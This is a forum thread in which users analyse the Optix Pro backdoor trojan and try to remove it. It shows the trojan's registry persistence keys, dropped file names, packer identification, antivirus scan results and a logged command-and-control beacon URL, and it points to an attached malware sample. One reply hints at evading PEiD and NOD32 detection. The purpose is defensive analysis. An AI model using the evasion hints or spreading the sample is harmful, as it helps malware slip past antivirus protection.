Playing with trojans to learn

Discussion in 'malware problems & news' started by emir, Jun 25, 2006.

Thread Status:
Not open for further replies.
  1. emir

    emir Registered Member

    Joined:
    Dec 21, 2005
    Posts:
    61
    I have Deep Freeze and to make sure the trojan is gone when I reboot and AppDefend/RegDefend to see what it
    does on a general level. I have come across a problem I can't seem to figure out how to get around and was hoping
    someone could help me. I plan to do some sidework for friends and associates cleaning malware from computers.
    I thought maybe I could use the XP recovery console to replace an entire folder such as system32 which I see
    now was ignorant of me to assume as this recovery console is only for recovery and not at all for repair. I have come
    across a trojan from the upload section of governmentsecurity.org that immediately kills sygate and gains full ownership
    in the sense that anything you do through windows explorer which in essence is anything period on windows is run
    through the this trojan being the parent process executing everything. This means that all calls to any program are
    executed through this program which explains why it cannot be detected even with the best trojan or other malware
    removal programs even run from a read-only removable media because once you attempt to execute it on your system
    it is always executed with this trojan being the parent process somehow. So I can rename the value of it in the registry
    and kill the process but it creates a different strand of itself which is a MS-DOS program with the same name which won't
    allow you to delete through regular means and even if you can boot into safe mode and clean up guess what: Once you
    delete the initial file in the system32 folder anything you attempt to run on your computer that normally would just run
    now asks what program you would like to open it up with meaning you have lost all functionality basically on any program.
    So I am wanting to know if there any other suggested methods short of re-formatting and re-installing windows in case I come
    up against this sort of sophistication on a clients computer. The name of the trojan is isyst32win.exe and I can say it is on the
    3rd page of trojan/virus upload section of governmentsecurity.org forum under the title "mallware" and says it is undetected by
    Nod32 which comes as no suprise it also is undetected by almost everything else as you will see:

    I think infected from P2P

    found in : %systemroot%\system32\isyst32win.exe
    Startup Method : Reg - Shell\Open (like sub7 & hidden to msconfig)
    Command Line : iwinsyst32.exe PASS "%1" %*
    AntiVirus : nod32
    AV Detected : Not yet but submitted (it maybe packed)
    Solution : open regedit.exe then find iwinsyst32.exe PASS "%1" %* and change it to "%1" %*


    Attached File(s)
    isyst32win.zip ( 606.33k ) Number of downloads: 98



    320X Nov 9 2005, 01:11 AM
    Post #2


    Master Sergeant


    Group: Members
    Posts: 442
    Joined: 14-December 03
    Member No.: 13,884


    It seems packed with Armadillo 1.xx - 2.xx -> Silicon Realms Toolworks [Overlay]



    320X Nov 9 2005, 01:26 AM
    Post #3


    Master Sergeant


    Group: Members
    Posts: 442
    Joined: 14-December 03
    Member No.: 13,884


    AntiVir Found Backdoor-Server/Small.18.L
    ArcaVir Found nothing
    Avast Found nothing
    AVG Antivirus Found BackDoor.Small.18.L
    BitDefender Found nothing
    ClamAV Found nothing
    Dr.Web Found nothing
    F-Prot Antivirus Found W32/Backdoor.BGY
    Fortinet Found W32/OptixPro.L-bdr
    Kaspersky Anti-Virus Found nothing
    NOD32 Found nothing
    Norman Virus Control Found nothing
    UNA Found Backdoor.Optix.Pro.13
    VBA32 Found Backdoor.Win32.Optix.Pro.13



    kbnet Nov 9 2005, 04:03 AM
    Post #4


    Master Sergeant


    Group: Specialist
    Posts: 520
    Joined: 3-September 04
    Member No.: 29,761


    Have you noticed that its contacting:

    http://xx004.netfirms.com/cgi-bin/x3.cgi?action=log&ip=[...-...-...-...]&port=
    4455&id=SQLinject&win=repclient1&rpass=mex&connection=Optix_Pro_v1.33&s7pass=14567

    "[...-...-...-...]" - This was my ip address, just blanked it out.
    I will look into this in a bit! Intriguing.

    Its packed with Armadillo ver 2.



    LittleHacker Nov 9 2005, 04:48 AM
    Post #5


    Sergeant First Class


    Group: Members
    Posts: 379
    Joined: 17-October 04
    Member No.: 33,625


    That's exactly right kbnet.
    just afew days ago I found a file in system32 with same icon that was listening on port 4455 and had a startup method Reg:HKLM/Run
    I killed the process and cleaned from reg but it but seems to raise again.
    So it may had a 2nd process/thread that check itself
    it maybe a polymorphic trojan ...

    btw I'm intersted in How you determaine the packer. I thought just crackers can do it. It seems there is a tool for it ...



    kbnet Nov 9 2005, 05:18 AM
    Post #6


    Master Sergeant


    Group: Specialist
    Posts: 520
    Joined: 3-September 04
    Member No.: 29,761


    You dont need a tool to tell you what a file is packed with - althought it can help. I determined it was
    Armadillo by quickly looking at the strings, i just opened the file in IDA.

    Here are the run keys:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\erg45htree
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\erg45htree

    QUOTE
    it maybe a polymorphic trojan ...

    Very unlikely bud - what makes you say that anyway?

    QUOTE
    I thought just crackers can do it.

    Not at all m8.

    Did you know it also makes 2 copies of itself:

    /windows/system32/isyst32win.exe
    /windows/system32/msdoswinsyst32.exe



    ash^ Nov 9 2005, 08:57 AM
    Post #7


    Private First Class


    Group: Members
    Posts: 72
    Joined: 2-October 04
    Member No.: 32,096


    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    btw I'm intersted in How you determaine the packer. I thought just crackers can do it. It seems there is a tool for it ...


    Get a tool called Peid i think the website is hxxp://peid.tk its a nifty tool.



    lobas Nov 9 2005, 01:33 PM
    Post #8


    Private First Class


    Group: Trial Members
    Posts: 44
    Joined: 13-March 04
    Member No.: 26,784


    u can acutally bypass peid easilyish and nod if u have nod32 detects APIS erm u can fool them with NOP
    loops peid chaning ep rva base image base etc..


    --------------------
    http://lobas.info



    kbnet Nov 10 2005, 01:55 AM
    Post #9


    Master Sergeant


    Group: Specialist
    Posts: 520
    Joined: 3-September 04
    Member No.: 29,761


    QUOTE
    u can acutally bypass peid easilyish and nod if u have nod32 detects APIS erm u can fool them with NOP loops
    peid chaning ep rva base image base etc..


    Do you have any more info on this?



    the_mul3 Nov 13 2005, 02:53 PM
    Post #10


    Private


    Group: Trial Members
    Posts: 5
    Joined: 13-November 05
    Member No.: 44,443


    QUOTE(ash^ @ Nov 9 2005, 01:57 PM)

    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    btw I'm intersted in How you determaine the packer. I thought just crackers can do it. It seems there is a tool for it ...


    Get a tool called Peid i think the website is hxxp://peid.tk its a nifty tool.


    while yer there check the forums for the custom packer sigs too

    AFAIK there are no polymorphic trojans, only partly polymorphs like mosucker and cia.
    donald dick is the closest to a real polymorph, but only its dropper is that. the installed server is not



    aiO Nov 13 2005, 03:29 PM
    Post #11


    Private First Class


    Group: Members
    Posts: 129
    Joined: 21-October 05
    Member No.: 42,373


    QUOTE(LittleHacker @ Nov 9 2005, 09:48 AM)

    That's exactly right kbnet.
    just afew days ago I found a file in system32 with same icon that was listening on port 4455 and had a startup method Reg:HKLM/Run
    I killed the process and cleaned from reg but it but seems to raise again.
    So it may had a 2nd process/thread that check itself
    it maybe a polymorphic trojan ...

    btw I'm intersted in How you determaine the packer. I thought just crackers can do it. It seems there is a tool for it ...

    lol i don't get how a hacker gets owned by something like this



    the_mul3 Nov 14 2005, 11:51 AM
    Post #12


    Private


    Group: Trial Members
    Posts: 5
    Joined: 13-November 05
    Member No.: 44,443


    QUOTE(aiO @ Nov 13 2005, 08:29 PM)

    lol i don't get how a hacker gets owned by something like this



    i know, its called social engineering



    LittleHacker Nov 15 2005, 05:19 AM
    Post #13


    Sergeant First Class


    Group: Members
    Posts: 379
    Joined: 17-October 04
    Member No.: 33,625


    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    You dont need a tool to tell you what a file is packed with - althought it can help. I determined it was
    Armadillo by quickly looking at the strings, i just opened the file in IDA.

    thanks , good hint! I some times use edit.com but IDA and maybe ollydbg are better


    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Here are the run keys:

    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\erg45htree
    HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\erg45htree

    run again and you may find something otherthan this


    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Very unlikely bud - what makes you say that anyway?

    as I said different startup methds is clear but I don't know ...

    QUOTE(kbnet @ Nov 9 2005, 11:18 AM)

    Did you know it also makes 2 copies of itself:
    /windows/system32/isyst32win.exe
    /windows/system32/msdoswinsyst32.exe

    yes I've found it before ...



    fearstriker2 Nov 28 2005, 11:27 PM
    Post #14


    Private


    Group: Trial Members
    Posts: 8
    Joined: 20-October 05
    Member No.: 42,250


    lol i it packed with morphine and got
    CODE
    File:isyst32.exe
    Status:
    INFECTED/MALWARE
    MD5 6b99d283653570c5cae58586b890ad69
    Packers detected:
    PE_PATCH.MORPHINE, MORPHINE, ARMADILLO
    Scanner results
    AntiVir
    Found Packer/Morphine
    ArcaVir
    Found nothing
    Avast
    Found nothing
    AVG Antivirus
    Found BackDoor.Small.18.L
    BitDefender
    Found Backdoor.Optix.H
    ClamAV
    Found nothing
    Dr.Web
    Found BackDoor.Optix.13
    F-Prot Antivirus
    Found nothing
    Fortinet
    Found nothing
    Kaspersky Anti-Virus
    Found Backdoor.Win32.Optix.Pro.s
    NOD32
    Found Win32/Optix.Pro.S
    Norman Virus Control
    Found nothing
    UNA
    Found nothing
    VBA32
    Found Backdoor.Win32.Optix.Pro.13


    Now its detected by Nod32..lol

    This post has been edited by fearstriker: Nov 28 2005, 11:34 PM



    Little_Dice Nov 29 2005, 01:35 AM
    Post #15


    Private First Class


    Group: Members
    Posts: 83
    Joined: 8-October 05
    Member No.: 41,038


    Im a little new at this but very interested.
    1. how did you find the proccesse and know it was a virus.
    2. How did you find the registry keys
    3. How did you know it was sending information to that website.
     
    Last edited by a moderator: Jul 6, 2006
  2. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Very interesting and very very scary- at least for me.
    What happens if u get it while in a sandbox?
     
  3. emir

    emir Registered Member

    Joined:
    Dec 21, 2005
    Posts:
    61
    Have not tested inside sandbox but this program has a way of gaining full ownership and killing a firewall such as sygate in less than 20 seconds of execution and replicating itself also as a MS-DOS program. The only way I could keep it from doing anything it wanted to like accessing it's server was with the high-quality low level protection that AppDefend/RegDefend provides. If you are curious though you should try with Deep-Freeze using your sandbox, I will try. What sanbox are you referring to? I would disconnect from the internet though before executing if you don't have AppDefend/RegDefend on your pc because I have yet to believe there is a program exactly as efficient in every way. But let me know what sandbox to try and I will. I would really like to know how to get rid of it the most though.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    I would like to try myself but i am very inexperienced. I am using GesWall so will be excited to see how good is GesWall in this regard?
    It will be inafact nice to play with it with Sandboxie, DefenceWall and BufferZone. I just want to see the real efficacy of these programmes. I will be thankful if u can test.
    It,s too scary by the way. I wonder who has invented it?
     
  5. emir

    emir Registered Member

    Joined:
    Dec 21, 2005
    Posts:
    61
    I tested in sandboxie environment and it does absolutely nothing. The problem with this though is that you never know what it attempted to do, I mean when I say it did nothing I mean absolutely nothing. You never would know of it's intentions or anything. I mean how will you know what programs to run out of this sandboxie when a known nasty has been run in it and it tells you nothing about what it attempts to do? Buffer Zone requires a reboot to work properly correct? Nothing survives a reboot with Deep Freeze so I cannot tell you about this program. I experienced strange behavior with this Defence Wall like to much trying to contact it's server and other things in the past but none the less I will try them, even though neither are now listed on majorgeeks. I will maybe still do this tonight, I have yet to receive an answer on removal of this nasty if I encounter it on someone's PC that it already infiltrates. Please someone, anyone for removal suggestions based on the info I supplied at the beginning of this post.
     
  6. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    http://www.gentlesecurity.com/
    http://www.sandboxie.com/
    http://www.softsphere.com/


    All are trustable to me, DefenceWall writter is a member here as well. Sandnoxie id free and has a really nice forum as well, GeSWall support is also very responsive.
    Especially sandbox has a unique feature that it keeps all sandboxed things in a separate portio( vietual?) and all the contents of this sandbox can be deleted with few clicks( a real nice feature that is absent in GesWall and DefenceWall- actually they work in a different way I think).

    Thanks.
     
  7. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    So any updates?
     
  8. emir

    emir Registered Member

    Joined:
    Dec 21, 2005
    Posts:
    61
    Like I had stated earlier this sandboxie apparently prevents the trojan from doing anything but it never lets you know what the trojan attempted to do, so you never know what is a malicious program or not inside this sandboxie, only once you run it outside then you will know and it is not detected by all but a couple antivirus. To tell you the truth if something gains full ownership and becomes the parent process to everything then how would you overcome this with even the most sophisticated malware detection/removal program, answer:you don't. So I am going to do some toying around with some more nasty's today, I might post some info.
     
  9. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Is there an 'aftermath' in Sandboxie at all? If it runs in Sandboxie, you should at least do "Explore contents of sandbox" and see the files it created. Maybe it doesn't even start Sandboxie at all (some trojans are 'smart' as not to run at all when sandboxed).

    Try uploading it here http://www.cwsandbox.org (the results are mailed to you). The output is somewhat cryptic and it's not guaranteed to work inside THAT sandbox, but you should definitly try.
     
  10. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    what is this cw sandbox.
     
  11. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    In that case, can u pls upload it to Jotti and virus total and post the results here as many people will be interested to see the results. Thanks.
     
  12. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    It's what it says.
     
  13. emir

    emir Registered Member

    Joined:
    Dec 21, 2005
    Posts:
    61
    I'm sorry I have been busy playing with something even worse than this trojan. I also believe figured out a way to entirely replace system 32 folder on a computer whose system 32 folder doesn't even have some of the same dll's and other applications and drivers in it's system 32 folder as the other computer which is not infected which I take a copy of system 32 folder from. This is a breakthrough for me as this folder is where from what I can see almost all malware no matter what it's caliber has to drop it's main components(usually dll's, sometimes exe's). This can mean I can fix a system and tie up any complications from incompatibility because of differences in these folders without having to re-install xp on a customer's computer who does not have restore cd, built-in restore or the xp cd if you know what I mean.(I cannot write what has to be done if all this criteria is unfortunately met) It is nearly impossible to completely clean some of this stuff I am coming across lately, it's like it has evolved recently, it's like a horror movie. That's the only way I know how to describe it. I see that to take a huge swing at this new stuff floating around is to do this with the system32 folder, and then work your way around finding anything anywhere else it has dropped itself. I only have to separately deal with the SAM file and some event log's, of course this can be done. Anyway I was reprimanded for posting the entire page of another website and I think for what administration I guess deemed as to lengthy of an explanation that was quoted from this site.(governmentsecurity.org)So I will be back and explain this newest trojan which seems to use windows native API calls,(I am too much of a newbie too explain right this second) which I have only seen in rootkit technologies until now.
     
  14. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    So it is not possible to upload it to Jotti or virus total and it will be good for antivirus vendors as well.
     
  15. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Why don't you do the usual way:

    Clean temporary files / cookies.
    Boot in safe and normal mode and repeat below

    Scan with several anti-virus programs.
    Scan with several anti-spyware programs.
    Scan with severa anti-trojan programs.

    Post a hijack this log in a forum and ask for help.

    Are you really infected or just playing with malware?

    Mrk
     
Loading...
Thread Status:
Not open for further replies.